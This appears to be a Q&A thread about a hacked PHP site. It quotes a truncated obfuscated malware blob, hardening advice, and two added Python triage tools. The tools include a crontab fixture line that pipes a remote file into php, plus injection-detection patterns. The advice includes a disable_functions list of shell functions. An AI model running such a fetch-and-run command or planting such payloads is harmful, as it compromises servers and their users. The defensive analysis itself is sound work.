
I found this on my php file:

<?php $glsaucbk = '5    156 x61"])))) { $GLOBALS["  ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4  x223}!+!<+{e%+*!*+fe4y4 x24-    x24]y8  x24-    x24]26  x24-        x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/

It's at the head of the file... I've tried to delete this but it reappears directly. I have used a PHP detector and it says DodgyPHP. Have you already had this malicious code in your PHP file?

Zoe
Fleeca
  • I ran this code on UnPHP.net and it came back as if it didn't do anything. – FluxCoder Jan 03 '18 at 16:28
  • Which file is it in the head of? Check your php.ini to see if there is an `auto_prepend_file` set and possibly edit this. You need to lock down and clean your system. – Martin Jan 03 '18 at 16:29
  • You've been hacked. If the string keeps reappearing then the vulnerability is still in place. You'll need to harden your server. (Probably after restoring it from backup, because hacked.) – Alex Howansky Jan 03 '18 at 16:30
  • I would suggest restoring from a time before the hack occurred. Make sure you are up to date on software versions. Are you using a CMS (WordPress, Joomla, etc.)? – vikingben Jan 03 '18 at 16:31
  • @FluxCoder I wouldn't expect it to run, it doesn't look like the whole string was posted. (There's no closing quote.) – Alex Howansky Jan 03 '18 at 16:33
  • What you've posted is an unterminated string. It's possible that this file is read from a different file and some sort of eval is performed, or this could just be a decoy for you to waste your time looking in the wrong place. – MonkeyZeus Jan 03 '18 at 16:35
  • I'm voting to close this question as off-topic because this isn't a programming question. Solving the problem of a hacked site is more appropriate for unix.SE, security.SE, or ServerFault.com. – Barmar Jan 03 '18 at 16:58
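A first pass at a blob like the one posted, as an added example that is not part of the question or its answers. Two things are visible in the fragment even though it is truncated: readable words appear when every character is shifted down by one (`bssbz)` is `array(`, `sfuvso` is `return`), and there is a call of the shape `$sorsjsw("", $wrwjkjc)`, which is what `create_function("", $code)` looks like once the function name is hidden in a variable. The script below pulls string literals out of a PHP fragment, runs the cheap reversible transforms droppers chain (byte shift, strrev, base64) and ranks the results by how much PHP they contain, and separately flags that call shape. The sample is built from two literals lifted from the question plus a base64 one constructed here; the transform list, the token weights and all names are my assumptions.

```python
"""Added example, not code from the question or its answers: rank cheap
deobfuscation transforms for PHP string literals and flag $var("", $code)
calls.  Samples are fragments from the question's blob or constructed here;
the transform list and scoring weights are assumptions."""
import base64
import re

# Tokens decoded PHP tends to contain; words weigh more than punctuation.
PHP_TOKENS = {"return": 3, "function": 3, "array(": 3, "eval(": 3, "base64_decode": 3,
              "create_function": 3, "$GLOBALS": 3, "$_POST": 3,
              "$": 1, "(": 1, ";": 1, "=": 1, "{": 1, "}": 1}

def shift(s, delta):
    """Add delta to every code point.  The blob is plaintext shifted by +1 at
    encode time ('bssbz)' is 'array(', 'sfuvso' is 'return'), so delta=-1 decodes it."""
    return "".join(chr((ord(c) + delta) % 256) for c in s)

def try_base64(s):
    """Strict base64 decode; returns '' instead of raising on non-base64 input."""
    try:
        return base64.b64decode(s, validate=True).decode("latin-1")
    except ValueError:          # binascii.Error is a ValueError subclass
        return ""

TRANSFORMS = {
    "identity": lambda s: s,
    "shift-1": lambda s: shift(s, -1),
    "shift+1": lambda s: shift(s, 1),
    "strrev": lambda s: s[::-1],
    "strrev+shift-1": lambda s: shift(s[::-1], -1),
    "base64": try_base64,
    "base64+shift-1": lambda s: shift(try_base64(s), -1),
}

def php_score(text):
    return sum(text.count(tok) * weight for tok, weight in PHP_TOKENS.items())

def rank_decodings(s):
    """Every transform applied to s, best PHP score first: [(name, decoded, score), ...]."""
    rows = []
    for name, fn in TRANSFORMS.items():
        decoded = fn(s)
        rows.append((name, decoded, php_score(decoded)))
    return sorted(rows, key=lambda row: -row[2])

# Single- or double-quoted PHP literals, honouring backslash escapes.
STRING_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")
# $var("", $code) is what create_function("", $code) looks like once the
# function name is hidden in a variable; the blob has $sorsjsw("", $wrwjkjc).
VARFUNC_CALL = re.compile(r"\$\w+\s*\(\s*(['\"])\1\s*,\s*\$\w+\s*\)")

def string_literals(php_src, min_len=4):
    return [a or b for a, b in STRING_LITERAL.findall(php_src) if len(a or b) >= min_len]

def hidden_create_function(php_src):
    return [m.group(0) for m in VARFUNC_CALL.finditer(php_src)]

def triage(php_src):
    """literal -> (best transform, decoded text, score); plus the suspect calls."""
    best = {lit: rank_decodings(lit)[0] for lit in string_literals(php_src)}
    return best, hidden_create_function(php_src)

# Constructed sample: two literals lifted from the question's blob, one base64
# literal made here, wrapped in the call shape the blob uses.
SAMPLE = ("<?php $a = 'sfuvso!sboepn)%epnbss-%rxW~'; $b = 'bssbz)'; "
          "$c = \"" + base64.b64encode(b"eval($_POST['x']);").decode() + "\"; "
          "$f = $g(\"\", $a); $f();")

if __name__ == "__main__":
    best, calls = triage(SAMPLE)
    for lit, (name, decoded, score) in best.items():
        print(f"{name:>15} {score:2d}  {lit!r} -> {decoded!r}")
    print("suspect calls:", calls)
```

Running it on the sample ranks `shift-1` first for the two lifted fragments (`return random($domarr,$qwV}` and `array(`), `base64` first for the constructed one, and reports `$g("", $a)` as the suspect call. The scoring is deliberately crude; on a real blob you would paste in the whole head of the infected file and look at the top two or three rows per literal rather than trusting the winner blindly, because malware often chains more than one of these transforms and may include escaped bytes that this simple literal regex does not unescape.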

2 Answers


While not a direct answer, this would be a useful step guide for how to clean up your system.

The symptoms show your system has almost certainly been hacked, and is still hackable.

You need to follow the link here http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/ and take significant steps to harden your system against future hacks:

  • Ensure that the userid running the web server process does not have write permission to the files it's serving. You can use ps aux | grep apache or ps aux | grep nginx to find the userid that your web server is running under. Make sure the files are not owned by that user. You can check for permissions by doing something like sudo -u <that userid> touch /path/to/web/files/some_test_file. If that successfully creates a file, then you have a problem and you need to adjust permissions.
  • Change all passwords
  • Stop using FTP, use FTPS or SFTP.
  • Update your PHP to latest current version.
    • Update any PHP CMS program (Joomla, WordPress, etc.) to latest version.
  • Reload your data from backups after checking for a backup you are certain has not been hacked.
  • Edit your php.ini and disable dangerous functions (such as exec) and classes:

     disable_functions = "exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,parse_ini_file,show_source"
    
  • Edit your php.ini and be sure to check your auto_prepend_file and auto_append_file values are expected or blank.
  • Set new usernames for database and server access. Stop using Root. Never use Root to access anything.
  • Check for and prevent unrecognised cron jobs running on your server.

Note: Could others who know add and edit this post to add further useful guides and information. Could be a good resource for future readers.

Alex Howansky
Martin
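The checklist in the answer above, turned into one read-only triage pass, as an added example that is not the answer's own code. It parses php.ini for `auto_prepend_file` / `auto_append_file` and for which of the listed dangerous functions are still enabled, lists files the web server user could modify, greps the head of every PHP file for the shapes seen in the question's blob (a `$GLOBALS["..."]` index on a garbled key, a `$var("", $code)` call, a huge literal right after `<?php`), and flags crontab lines that fetch or run remote code. The web root, php.ini and crontab are constructed in a temp dir so the script runs offline; the pattern lists, the path names and the assumption that the web server runs as the current uid are mine.

```python
"""Added example, not code from the answer above: a read-only triage pass
over its hardening checklist.  The web root, php.ini and crontab are
constructed fixtures; pattern lists and the web-server uid are assumptions."""
import os
import re
import stat
import tempfile

DANGEROUS = {"exec", "passthru", "shell_exec", "system", "proc_open", "popen",
             "curl_multi_exec", "parse_ini_file", "show_source"}

# Shapes visible in the question's blob: a $GLOBALS index on a garbled key,
# $var("", $code) (create_function with the name hidden in a variable), plus
# the generic eval(base64_decode(...)) family and a huge literal right after <?php.
INJECTION_PATTERNS = [
    re.compile(r"\$GLOBALS\s*\[\s*['\"]"),
    re.compile(r"\$\w+\s*\(\s*(['\"])\1\s*,\s*\$\w+\s*\)"),
    re.compile(r"\b(?:eval|assert|create_function)\s*\(\s*(?:base64_decode|gzinflate|str_rot13|strrev)\s*\("),
    re.compile(r"^<\?php\s+\$\w+\s*=\s*'[^']{200,}", re.M),
]
CRON_FLAGS = re.compile(r"\bcurl\b|\bwget\b|base64|php\s+-r|/dev/shm|/tmp/")

def parse_ini(text):
    """Minimal php.ini reader: key = value, ';' comments, surrounding quotes dropped."""
    out = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            out[key] = value.strip("\"'")
    return out

def ini_findings(text):
    """Non-empty prepend/append hooks, and which DANGEROUS functions are not disabled."""
    ini = parse_ini(text)
    hooks = {k: ini[k] for k in ("auto_prepend_file", "auto_append_file") if ini.get(k)}
    disabled = {f.strip() for f in ini.get("disable_functions", "").split(",")}
    return {"hooks": hooks, "still_enabled": sorted(DANGEROUS - disabled)}

def web_user_writable(root, web_uid):
    """path -> reasons the web server user (web_uid) could modify that file."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            reasons = []
            if st.st_uid == web_uid:
                reasons.append("owned-by-web-user")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                hits[os.path.relpath(path, root)] = reasons
    return hits

def scan_injections(root):
    """path -> indexes into INJECTION_PATTERNS that matched the head of the file."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:   # latin-1 never fails on binary junk
                head = fh.read(64 * 1024)                 # the injection sits at the top
            matched = [i for i, pat in enumerate(INJECTION_PATTERNS) if pat.search(head)]
            if matched:
                hits[os.path.relpath(path, root)] = matched
    return hits

def suspicious_cron(text):
    return [l for l in text.splitlines() if l.strip() and not l.startswith("#") and CRON_FLAGS.search(l)]

# --- constructed fixtures ---------------------------------------------------
SAMPLE_INI = """; constructed php.ini fragment
disable_functions = "exec,system"
auto_prepend_file = /var/www/html/wp-includes/.cache.php
auto_append_file =
"""
SAMPLE_CRON = """# constructed crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.5/r.txt | php
"""
INFECTED = ("<?php $glsaucbk = '" + "5 156 x61 " * 40 + "'; $GLOBALS[\"  ]K9]77\"] = 1; "
            "$nkfhbiv = $sorsjsw(\"\", $wrwjkjc); $nkfhbiv(); ?>\n<html><body>site</body></html>\n")
CLEAN = "<?php\n// constructed clean file\nfunction hello($name) { return 'hi ' . $name; }\n"

def demo(web_uid=None):
    """Build the constructed web root and run every check; returns the findings."""
    root = tempfile.mkdtemp(prefix="triage-")
    os.makedirs(os.path.join(root, "wp-includes"))
    index, clean = os.path.join(root, "index.php"), os.path.join(root, "wp-includes", "clean.php")
    with open(index, "w", encoding="latin-1") as fh:
        fh.write(INFECTED)
    with open(clean, "w") as fh:
        fh.write(CLEAN)
    os.chmod(index, 0o666)   # sloppy deploy: world-writable
    os.chmod(clean, 0o644)
    # Assumption: the web server runs as the current user, the common shared-host mistake.
    web_uid = os.getuid() if web_uid is None else web_uid
    return {"ini": ini_findings(SAMPLE_INI),
            "writable": web_user_writable(root, web_uid),
            "injections": scan_injections(root),
            "cron": suspicious_cron(SAMPLE_CRON)}

if __name__ == "__main__":
    for section, result in demo().items():
        print(section, result)
```

On a real box you would point `web_user_writable` at the document root with the uid from `ps aux | grep -E 'apache|nginx|php-fpm'`, feed `ini_findings` the output of `php --ini` plus any `.user.ini` / `.htaccess` `php_value` lines (which can also set `auto_prepend_file`), and feed `suspicious_cron` every user's crontab and `/etc/cron.*`. Anything this flags is evidence to preserve, not something to quietly delete: as the answer says, the fix is restore from a known-clean backup and close the hole, because a file that reappears is being rewritten by something still running.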

I don't think you need to know any more than you do already:

  • It's code you didn't expect to be there.
  • It's clearly obfuscated; there's rarely a reason to obfuscate PHP other than to hide malicious code.
  • It reappears when you delete it, implying there are other malicious scripts running and self-repairing.

You should at least:

  1. Take the site offline immediately. It may be infecting other people, or used for criminal activity on your account.
  2. If this is a third-party application (e.g. WordPress, phpBB, etc.), reinstall from scratch with an up-to-date version, using only well-known plugins which are kept up to date. If it is code you wrote, you need to audit its security, or pay an expert to do so.
  3. Rescue your data from backup, ensuring to the best of your ability that the backup is from before the compromise, and apply it to the cleanly installed site.
IMSoP